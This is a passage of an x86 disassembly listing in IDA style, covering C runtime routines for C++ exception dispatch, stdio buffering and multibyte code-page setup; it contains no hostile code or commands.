call sub_418820
push eax
push dword ptr [esi+18h]
push edi
call sub_413ACE
jmp short loc_418B4A
; ---------------------------------------------------------------------------
loc_418B45: ; CODE XREF: sub_4189E4+5C�j
; sub_4189E4+6E�j ...
call sub_418F40
loc_418B4A: ; CODE XREF: sub_4189E4+83�j
; sub_4189E4+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418B4E: ; CODE XREF: sub_4189E4+1B�j
; sub_4189E4+25�j ...
call __SEH_epilog
retn
sub_4189E4 endp
; =============== S U B R O U T I N E =======================================
sub_418B54 proc near ; DATA XREF: .rdata:stru_427F38�o
xor eax, eax
inc eax
retn
sub_418B54 endp
; ---------------------------------------------------------------------------
loc_418B58: ; DATA XREF: .rdata:stru_427F38�o
mov esp, [ebp-18h]
jmp sub_418F0B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B60 proc near ; CODE XREF: sub_418BC7+A2�p
; sub_418C87+17D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_418B74
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_4189E4
pop ecx
pop ecx
loc_418B74: ; CODE XREF: sub_418B60+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_418B80
push esi
jmp short loc_418B83
; ---------------------------------------------------------------------------
loc_418B80: ; CODE XREF: sub_418B60+1B�j
push [ebp+arg_14]
loc_418B83: ; CODE XREF: sub_418B60+1E�j
call sub_413AD5
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41870D
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41883D
add esp, 28h
test eax, eax
jz short loc_418BC5
push esi
push eax
call sub_413A9E
loc_418BC5: ; CODE XREF: sub_418B60+5C�j
pop ebp
retn
sub_418B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BC7 proc near ; CODE XREF: sub_418C87+1D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_418C84
call sub_415456
cmp dword ptr [eax+74h], 0
jz short loc_418C06
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_413D52
add esp, 1Ch
test eax, eax
jnz short loc_418C84
loc_418C06: ; CODE XREF: sub_418BC7+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_413BF2
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_418C83
push ebx
loc_418C2C: ; CODE XREF: sub_418BC7+B9�j
cmp esi, [edi]
jl short loc_418C74
cmp esi, [edi+4]
jg short loc_418C74
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_418C4D
cmp byte ptr [ecx+8], 0
jnz short loc_418C74
loc_418C4D: ; CODE XREF: sub_418BC7+7E�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_418B60
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_418C74: ; CODE XREF: sub_418BC7+67�j
; sub_418BC7+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_418C2C
pop ebx
loc_418C83: ; CODE XREF: sub_418BC7+62�j
pop edi
loc_418C84: ; CODE XREF: sub_418BC7+F�j
; sub_418BC7+3D�j
pop esi
leave
retn
sub_418BC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C87 proc near ; CODE XREF: sub_418E69+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_418CA7
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_418CAC
loc_418CA7: ; CODE XREF: sub_418C87+16�j
call sub_418F40
loc_418CAC: ; CODE XREF: sub_418C87+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_418E3E
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_418D38
cmp [ebx+14h], edi
jnz short loc_418D38
cmp dword ptr [ebx+1Ch], 0
jnz short loc_418D38
call sub_415456
cmp dword ptr [eax+78h], 0
jz loc_418E36
call sub_415456
mov esi, [eax+78h]
mov [ebp+arg_0], esi
call sub_415456
mov eax, [eax+7Ch]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_41CDC5
test eax, eax
pop ecx
pop ecx
jnz short loc_418D10
call sub_418F40
loc_418D10: ; CODE XREF: sub_418C87+82�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_418E3B
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_418D35
cmp [eax+14h], edi
jnz short loc_418D35
cmp dword ptr [eax+1Ch], 0
jnz short loc_418D35
call sub_418F40
loc_418D35: ; CODE XREF: sub_418C87+9C�j
; sub_418C87+A1�j ...
mov ebx, [ebp+arg_0]
loc_418D38: ; CODE XREF: sub_418C87+40�j
; sub_418C87+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_418E3E
cmp dword ptr [ebx+10h], 3
jnz loc_418E3E
cmp [ebx+14h], edi
jnz loc_418E3E
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_413BF2
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_418E26
jmp short loc_418D85
; ---------------------------------------------------------------------------
loc_418D82: ; CODE XREF: sub_418C87+199�j
mov esi, [ebp+var_18]
loc_418D85: ; CODE XREF: sub_418C87+F9�j
cmp [eax], esi
jg loc_418E11
cmp esi, [eax+4]
jg short loc_418E11
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_418E11
loc_418D9F: ; CODE XREF: sub_418C87+15B�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_418DD8
loc_418DB4: ; CODE XREF: sub_418C87+14C�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_4186A0
test eax, eax
pop ecx
jnz short loc_418DE6
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_418DB4
mov eax, [ebp+var_4]
loc_418DD8: ; CODE XREF: sub_418C87+12B�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_418D9F
jmp short loc_418E11
; ---------------------------------------------------------------------------
loc_418DE6: ; CODE XREF: sub_418C87+140�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_418B60
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_418E11: ; CODE XREF: sub_418C87+100�j
; sub_418C87+109�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_418D82
loc_418E26: ; CODE XREF: sub_418C87+F3�j
cmp [ebp+arg_14], 0
jz short loc_418E36
push 1
push ebx
call sub_4187DB
pop ecx
pop ecx
loc_418E36: ; CODE XREF: sub_418C87+56�j
; sub_418C87+1A3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418E3B: ; CODE XREF: sub_418C87+8F�j
mov ebx, [ebp+arg_0]
loc_418E3E: ; CODE XREF: sub_418C87+31�j
; sub_418C87+B7�j ...
cmp [ebp+arg_14], 0
jnz short loc_418E64
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_418BC7
add esp, 20h
jmp short loc_418E36
; ---------------------------------------------------------------------------
loc_418E64: ; CODE XREF: sub_418C87+1BB�j
jmp sub_418F0B
sub_418C87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E69 proc near ; CODE XREF: .text:00413B48�p
; .text:00413B78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_418E86
call sub_418F40
loc_418E86: ; CODE XREF: sub_418E69+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_418EAE
cmp dword ptr [esi+4], 0
jz short loc_418F04
cmp [ebp+arg_14], 0
jnz short loc_418F04
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41870D
add esp, 10h
jmp short loc_418F04
; ---------------------------------------------------------------------------
loc_418EAE: ; CODE XREF: sub_418E69+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_418F04
cmp dword ptr [eax], 0E06D7363h
jnz short loc_418EE8
cmp [eax+14h], edi
jbe short loc_418EE8
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_418EE8
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_418F07
; ---------------------------------------------------------------------------
loc_418EE8: ; CODE XREF: sub_418E69+51�j
; sub_418E69+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_418C87
add esp, 20h
loc_418F04: ; CODE XREF: sub_418E69+2A�j
; sub_418E69+30�j ...
xor eax, eax
inc eax
loc_418F07: ; CODE XREF: sub_418E69+7D�j
pop edi
pop esi
pop ebp
retn
sub_418E69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F0B proc near ; CODE XREF: sub_4186EF+19�j
; .text:0041881B�j ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041CE15 SIZE 00000018 BYTES
push 8
push offset stru_427F48
call __SEH_prolog
call sub_415456
cmp dword ptr [eax+6Ch], 0
jz short loc_418F3B
and [ebp+ms_exc.disabled], 0
call sub_415456
call dword ptr [eax+6Ch]
jmp short loc_418F37
; ---------------------------------------------------------------------------
loc_418F30: ; DATA XREF: .rdata:stru_427F48�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_418F34: ; DATA XREF: .rdata:stru_427F48�o
mov esp, [ebp+ms_exc.old_esp]
loc_418F37: ; CODE XREF: sub_418F0B+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418F3B: ; CODE XREF: sub_418F0B+15�j
jmp loc_41CE15
sub_418F0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F40 proc near ; CODE XREF: sub_413BF2+23�p
; sub_413BF2:loc_413C5C�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_427F58
call __SEH_prolog
mov eax, off_42CE40
test eax, eax
jz short loc_418F68
and [ebp+ms_exc.disabled], 0
call eax ; sub_418F0B
jmp short loc_418F64
; ---------------------------------------------------------------------------
loc_418F5D: ; DATA XREF: .rdata:stru_427F58�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_418F61: ; DATA XREF: .rdata:stru_427F58�o
mov esp, [ebp+ms_exc.old_esp]
loc_418F64: ; CODE XREF: sub_418F40+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418F68: ; CODE XREF: sub_418F40+13�j
jmp sub_418F0B
sub_418F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F70 proc near ; CODE XREF: sub_413D01+3D�p
; sub_41870D+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_413ED1
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_418FAF
mov ecx, 2
loc_418FAF: ; CODE XREF: sub_418F70+38�j
push ecx
call sub_413ED1
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_418F70 endp
; =============== S U B R O U T I N E =======================================
sub_418FBC proc near ; CODE XREF: sub_41414F+1E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41AA50
test eax, eax
pop ecx
jz short loc_419040
cmp esi, offset dword_42C920
jnz short loc_418FDA
xor eax, eax
jmp short loc_418FE5
; ---------------------------------------------------------------------------
loc_418FDA: ; CODE XREF: sub_418FBC+18�j
cmp esi, offset dword_42C940
jnz short loc_419040
xor eax, eax
inc eax
loc_418FE5: ; CODE XREF: sub_418FBC+1C�j
inc dword_479EB8
test word ptr [esi+0Ch], 10Ch
jnz short loc_419040
push ebx
push edi
lea edi, ds:47A01Ch[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_419026
push ebx
call sub_41344D
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_419026
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_419033
; ---------------------------------------------------------------------------
loc_419026: ; CODE XREF: sub_418FBC+48�j
; sub_418FBC+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_419033: ; CODE XREF: sub_418FBC+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_419040: ; CODE XREF: sub_418FBC+10�j
; sub_418FBC+24�j ...
xor eax, eax
pop esi
retn
sub_418FBC endp
; =============== S U B R O U T I N E =======================================
sub_419044 proc near ; CODE XREF: sub_41414F+3A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_41906D
push esi
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41906C
push esi
call sub_41644D
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_41906C: ; CODE XREF: sub_419044+10�j
pop esi
locret_41906D: ; CODE XREF: sub_419044+5�j
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
sub_41906E proc near ; CODE XREF: sub_4192C7+FF�p
; sub_4192C7+149�p
sub eax, 3A4h
jz short loc_419097
sub eax, 4
jz short loc_419091
sub eax, 0Dh
jz short loc_41908B
dec eax
jz short loc_419085
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419085: ; CODE XREF: sub_41906E+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41908B: ; CODE XREF: sub_41906E+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_419091: ; CODE XREF: sub_41906E+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_419097: ; CODE XREF: sub_41906E+5�j
mov eax, 411h
retn
sub_41906E endp
; =============== S U B R O U T I N E =======================================
sub_41909D proc near ; CODE XREF: sub_4192C7:loc_41943C�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47A400
rep stosd
stosb
xor eax, eax
mov dword_47A504, eax
mov dword_47A3F0, eax
mov dword_47A3E8, eax
mov edi, offset word_47A510
stosd
stosd
stosd
pop edi
retn
sub_41909D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190C6 proc near ; CODE XREF: sub_4192C7:loc_419441�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_42CE38
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_47A504
call ds:dword_41F18C ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_419206
xor eax, eax
loc_4190FB: ; CODE XREF: sub_4190C6+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_4190FB
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_41914B
push ebx
lea edx, [ebp+var_11]
push edi
loc_41911A: ; CODE XREF: sub_4190C6+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_419141
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_419141: ; CODE XREF: sub_4190C6+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_41911A
pop edi
pop ebx
loc_41914B: ; CODE XREF: sub_4190C6+4D�j
push 0
push dword_47A3E8
lea eax, [ebp+var_518]
push dword_47A504
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41AF01
push 0
push dword_47A504
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_47A3E8
call sub_4182E4
push 0
push dword_47A504
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_47A3E8
call sub_4182E4
add esp, 5Ch
xor eax, eax
loc_4191C0: ; CODE XREF: sub_4190C6+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_4191E3
or byte_47A401[eax], 10h
mov cl, [ebp+eax+var_218]
loc_4191DB: ; CODE XREF: sub_4190C6+130�j
mov byte_47A520[eax], cl
jmp short loc_4191FF
; ---------------------------------------------------------------------------
loc_4191E3: ; CODE XREF: sub_4190C6+105�j
test cl, 2
jz short loc_4191F8
or byte_47A401[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_4191DB
; ---------------------------------------------------------------------------
loc_4191F8: ; CODE XREF: sub_4190C6+120�j
and byte_47A520[eax], 0
loc_4191FF: ; CODE XREF: sub_4190C6+11B�j
inc eax
cmp eax, esi
jb short loc_4191C0
jmp short loc_41924A
; ---------------------------------------------------------------------------
loc_419206: ; CODE XREF: sub_4190C6+2D�j
xor eax, eax
loc_419208: ; CODE XREF: sub_4190C6+182�j
cmp eax, 41h
jb short loc_419226
cmp eax, 5Ah
ja short loc_419226
or byte_47A401[eax], 10h
mov cl, al
add cl, 20h
loc_41921E: ; CODE XREF: sub_4190C6+176�j
mov byte_47A520[eax], cl
jmp short loc_419245
; ---------------------------------------------------------------------------
loc_419226: ; CODE XREF: sub_4190C6+145�j
; sub_4190C6+14A�j
cmp eax, 61h
jb short loc_41923E
cmp eax, 7Ah
ja short loc_41923E
or byte_47A401[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41921E
; ---------------------------------------------------------------------------
loc_41923E: ; CODE XREF: sub_4190C6+163�j
; sub_4190C6+168�j
and byte_47A520[eax], 0
loc_419245: ; CODE XREF: sub_4190C6+15E�j
inc eax
cmp eax, esi
jb short loc_419208
loc_41924A: ; CODE XREF: sub_4190C6+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_4182D6
leave
retn
sub_4190C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419258 proc near ; CODE XREF: sub_4195CB+1A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_427F68
call __SEH_prolog
push 0Dh
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_415456
mov edi, eax
mov [ebp+var_1C], edi
mov esi, [edi+60h]
mov [ebp+var_20], esi
cmp esi, dword_47A3EC
jz short loc_4192AA
test esi, esi
jz short loc_419297
dec dword ptr [esi]
jnz short loc_419297
push esi
call sub_412FE4
pop ecx
loc_419297: ; CODE XREF: sub_419258+32�j
; sub_419258+36�j
mov eax, dword_47A3EC
mov [edi+60h], eax
mov esi, dword_47A3EC
mov [ebp+var_20], esi
inc dword ptr [esi]
loc_4192AA: ; CODE XREF: sub_419258+2E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4192BE
mov eax, esi
call __SEH_epilog
retn
sub_419258 endp
; =============== S U B R O U T I N E =======================================
sub_4192BB proc near ; DATA XREF: .rdata:stru_427F68�o
mov esi, [ebp-20h]
sub_4192BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4192BE proc near ; CODE XREF: sub_419258+56�p
push 0Dh
call sub_41686D
pop ecx
retn
sub_4192BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192C7 proc near ; CODE XREF: sub_41945D+9F�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_41943C
xor edx, edx
xor eax, eax
loc_4192EC: ; CODE XREF: sub_4192C7+36�j
cmp dword_42CE58[eax], esi
jz short loc_419359
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_4192EC
lea eax, [ebp+var_1C]
push eax
push esi
call ds:dword_41F18C ; GetCPInfo
cmp eax, 1
jnz loc_419434
push 40h
xor eax, eax
cmp [ebp+var_1C], 1
pop ecx
mov edi, offset byte_47A400
rep stosd
stosb
mov dword_47A504, esi
mov dword_47A3E8, ebx
jbe loc_419422
cmp [ebp+var_16], 0
jz loc_4193FA
lea ecx, [ebp+var_15]
loc_419343: ; CODE XREF: sub_4192C7+12D�j
mov dl, [ecx]
test dl, dl
jz loc_4193FA
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_4193EA
; ---------------------------------------------------------------------------
loc_419359: ; CODE XREF: sub_4192C7+2B�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47A400
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_42CE68[ecx]
loc_419375: ; CODE XREF: sub_4192C7+EB�j
mov al, [ebx]
mov esi, ebx
jmp short loc_4193A4
; ---------------------------------------------------------------------------
loc_41937B: ; CODE XREF: sub_4192C7+DF�j
mov dl, [esi+1]
test dl, dl
jz short loc_4193A8
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_4193A0
mov edx, [ebp+var_8]
mov dl, byte_42CE50[edx]
loc_419395: ; CODE XREF: sub_4192C7+D7�j
or byte_47A401[eax], dl
inc eax
cmp eax, edi
jbe short loc_419395
loc_4193A0: ; CODE XREF: sub_4192C7+C3�j
inc esi
inc esi
mov al, [esi]
loc_4193A4: ; CODE XREF: sub_4192C7+B2�j
test al, al
jnz short loc_41937B
loc_4193A8: ; CODE XREF: sub_4192C7+B9�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_419375
mov eax, [ebp+arg_0]
mov dword_47A504, eax
mov dword_47A3F0, 1
call sub_41906E
lea ecx, dword_42CE5C[ecx]
mov esi, ecx
mov edi, offset word_47A510
movsd
movsd
mov dword_47A3E8, eax
movsd
jmp short loc_419441
; ---------------------------------------------------------------------------
loc_4193E2: ; CODE XREF: sub_4192C7+125�j
or byte_47A401[eax], 4
inc eax
loc_4193EA: ; CODE XREF: sub_4192C7+8D�j
cmp eax, edx
jbe short loc_4193E2
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_419343
loc_4193FA: ; CODE XREF: sub_4192C7+73�j
; sub_4192C7+80�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_4193FF: ; CODE XREF: sub_4192C7+145�j
or byte_47A401[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4193FF
mov eax, esi
call sub_41906E
mov dword_47A3E8, eax
mov dword_47A3F0, ecx
jmp short loc_419428
; ---------------------------------------------------------------------------
loc_419422: ; CODE XREF: sub_4192C7+69�j
mov dword_47A3F0, ebx
loc_419428: ; CODE XREF: sub_4192C7+159�j
xor eax, eax
mov edi, offset word_47A510
stosd
stosd
stosd
jmp short loc_419441
; ---------------------------------------------------------------------------
loc_419434: ; CODE XREF: sub_4192C7+46�j
cmp dword_47A024, ebx
jz short loc_41944A
loc_41943C: ; CODE XREF: sub_4192C7+1B�j
call sub_41909D
loc_419441: ; CODE XREF: sub_4192C7+119�j
; sub_4192C7+16B�j
call sub_4190C6
xor eax, eax
jmp short loc_41944D
; ---------------------------------------------------------------------------
loc_41944A: ; CODE XREF: sub_4192C7+173�j
or eax, 0FFFFFFFFh
loc_41944D: ; CODE XREF: sub_4192C7+181�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41945D proc near ; CODE XREF: sub_4195AD+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_427F78
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Dh
call sub_416901
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_47A024, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_41949A
mov dword_47A024, 1
call ds:dword_41F188 ; GetOEMCP
jmp short loc_4194C5
; ---------------------------------------------------------------------------
loc_41949A: ; CODE XREF: sub_41945D+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_4194B1
mov dword_47A024, 1
call ds:dword_41F184 ; GetACP
jmp short loc_4194C5
; ---------------------------------------------------------------------------
loc_4194B1: ; CODE XREF: sub_41945D+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_4194C5
mov dword_47A024, 1
mov eax, dword_47A188
loc_4194C5: ; CODE XREF: sub_41945D+3B�j
; sub_41945D+52�j ...
mov [ebp+arg_0], eax
cmp eax, dword_47A504
jz loc_41958F
mov esi, dword_47A3EC
mov [ebp+var_20], esi
cmp esi, edi
jz short loc_4194E5
cmp [esi], edi
jz short loc_4194F5
loc_4194E5: ; CODE XREF: sub_41945D+82�j
push 220h
call sub_41344D
pop ecx
mov esi, eax
mov [ebp+var_20], esi
loc_4194F5: ; CODE XREF: sub_41945D+86�j
cmp esi, edi
jz short loc_419578
push [ebp+arg_0]
call sub_4192C7
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jnz short loc_419578
mov [esi], edi
mov eax, dword_47A504
mov [esi+4], eax
mov eax, dword_47A3F0
mov [esi+8], eax
